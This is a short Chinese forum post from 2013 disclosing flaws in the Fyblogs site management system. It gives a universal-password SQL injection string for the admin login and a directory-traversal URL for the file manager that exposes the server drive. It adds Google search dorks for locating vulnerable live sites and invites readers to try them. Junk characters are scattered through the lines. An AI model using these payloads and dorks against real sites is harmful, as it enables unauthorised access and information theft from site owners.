漏洞类型: 未授权访问/权限绕过
6 Q. e: o6 _% M |- O. I
' D x* v% X; A/ ^0 o/ N4 y! f简要描述:6 o* I h0 O/ U2 |
4 K" {2 m6 U0 `) s8 u
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
1 N6 |0 b9 b: b1 P& [# ~7 D$ p8 n2 f3 \( P8 z
详细说明:- o. ^0 ~5 n" D0 y
( K7 m% ?* B9 A- ^. y
后台万能密码 'or'='or'
% l4 k2 G0 s9 b1 r' g后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!( x6 ]3 v. e' f7 v7 L4 e9 R& ?
admin/uploadfile.asp?currentFolder=/upfiles/../; q: h2 t7 {' L( i% K
5 d9 d! E7 Z, W4 q# d
漏洞证明:
9 t: r0 |0 ]' R6 p% ?5 j0 @; M! i# X' j5 {
谷歌:inurl:type.asp?id=1 新闻中心
( V f3 E6 _" _1 L- M+ L或者 :inurl:download_ok.asp?
: D" Y' \3 d# I) z% G& d
- i3 ]* b& Q/ v+ _/ o6 D可以测试
, `+ V" G4 ?0 h8 Z& X$ |# M
' X0 Y4 a: E* }/ |# G
8 T9 m: D7 W- z8 s1 [0 t |
发表于 2013-3-7 13:07:46
收藏
支持
反对